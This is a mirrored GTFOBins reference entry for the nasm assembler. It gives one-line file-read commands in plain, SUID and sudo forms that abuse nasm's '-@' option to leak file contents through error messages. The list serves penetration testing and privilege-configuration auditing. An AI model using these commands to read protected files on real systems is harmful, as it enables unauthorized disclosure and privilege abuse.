1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/nasm.md
Sahil Siddiq d708c8b88b
Add nasm
2021-09-26 11:27:24 +02:00

410 B

description functions
The file content is treated as command line options and disclosed throught error messages, so this is not suitable for reading arbitrary binary data.
file-read suid sudo
code
LFILE=file_to_read nasm -@ $LFILE
code
LFILE=file_to_read ./nasm -@ $LFILE
code
LFILE=file_to_read sudo nasm -@ $LFILE